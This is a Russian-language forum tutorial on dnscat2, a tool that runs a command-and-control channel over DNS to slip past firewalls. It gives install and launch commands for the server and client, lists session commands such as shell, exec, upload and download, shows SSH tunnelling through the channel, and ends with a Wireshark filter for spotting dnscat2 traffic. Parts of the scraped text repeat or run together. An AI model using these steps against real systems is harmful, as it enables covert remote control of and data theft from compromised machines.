Всем привет, сегодня я бы хотел вам рассказать об утилите dnscat2.
dnscat2 - программа для для создания C&C канала, используя DNS. Включает в себя серверную часть, которая написана на Ruby и клиент, написанный на С.
Часто бывает, что проходу нормального трафика мешает firewall, а резолв имен почти всегда разрешен. Примерную схему можете видеть ниже:
Cкачивание и установкa:
Установка серверной части:
Установка клиентской части:
Запускаем:
Сервер:
Клиент: запускаете на удаленной машине.
Как только произойдет подключение dnscat2 выведет вам номер сессии.
После выбора сессии:
У вас будет доступен ряд команд:
Выбираем сессию и вводим команду:
Теперь вы можете спокойно подключиться к той машине, которую не видно из вне через ssh.
Кстати dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что не гарантирует 100% криптографическую стойкость, но защита есть.
Делаем дамп через
И в информации о пакете ищем dnscat.
Полезные ссылки
https://github.com/iagox86/dnscat2 - Страница dnscat, с его документацией.
P.S возможно в некоторых моментах вылез за рамки раздела "Софт", но это нужно было, чтобы показать функционал.
Всем спасибо за внимание.
Что это такое и с чем его едят
dnscat2 - программа для для создания C&C канала, используя DNS. Включает в себя серверную часть, которая написана на Ruby и клиент, написанный на С.
Command and Control сервер - компьютер, контролируемый атакующим, который отправляет команды на скомпрометированную машину.
В чем смысл маскировки трафика под DNS
Часто бывает, что проходу нормального трафика мешает firewall, а резолв имен почти всегда разрешен. Примерную схему можете видеть ниже:
Cкачивание и установкa:
Bash:
sudo apt-get updаte
sudo аpt-get -y instаll ruby-dev git mаke g++
sudo gem install bundler
git clone https://github.com/iagox86/dnscat2.gitsudo аpt-get updаte && sudo аpt-get -y instаll ruby-dev git mаke g++ && sudo gem install bundler && git clone https://github.com/iagox86/dnscat2.git
Bash:
cd dnscat2/server
bundle instаll
Bash:
cd dnscat2/client
makeiagox86/dnscat2 найдите вашу ошибку здесь.
Тут описаны некоторые ошибки. Если вашей ошибки нет, то пишите в этой теме или загуглите.
Тут описаны некоторые ошибки. Если вашей ошибки нет, то пишите в этой теме или загуглите.
К делу
Запускаем:
Сервер:
sudo ruby dnscat2.rbКлиент: запускаете на удаленной машине.
Сервер:
Клиент:
Код:
sudo ruby dnscat2.rb legitdnsserver.com
Код:
./build legitdnsserver.comПосле выбора сессии:
Код:
sessions -i <номер сессии>
Код:
clear
delay
download
echo
exec
help
listen
ping
quit
set
shell
shutdown
suspend
tunnels
unset
upload
window
windowsПроброс туннеля
Если вам нужен удобный доступ к машинам в локальной сети по SSH, то это очень полезная вещь.
Выбираем сессию и вводим команду:
Код:
listen <port> <dest ip>:<ssh port>
Код:
ssh -P <port> username@127.0.0.1Кстати dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что не гарантирует 100% криптографическую стойкость, но защита есть.
Как обнаружить dnscat2 на машине
Делаем дамп через
Ссылка скрыта от гостей
и забиваем следующий фильтр:
Код:
dns.qry.name.len > 16 and !mdns16 - просто длина имени DNS домена. Я подбирал вручную, у вас это число может отличаться. Чтобы его подобрать просто смотрите в результат фильтрации.
После этого фильтра могут остаться и нормальные DNS запросы, просто ищите dnscat.
После этого фильтра могут остаться и нормальные DNS запросы, просто ищите dnscat.
Полезные ссылки
Ссылка скрыта от гостей
- Про обнаружение DNS туннелей.P.S возможно в некоторых моментах вылез за рамки раздела "Софт", но это нужно было, чтобы показать функционал.
Всем спасибо за внимание.
Последнее редактирование модератором:
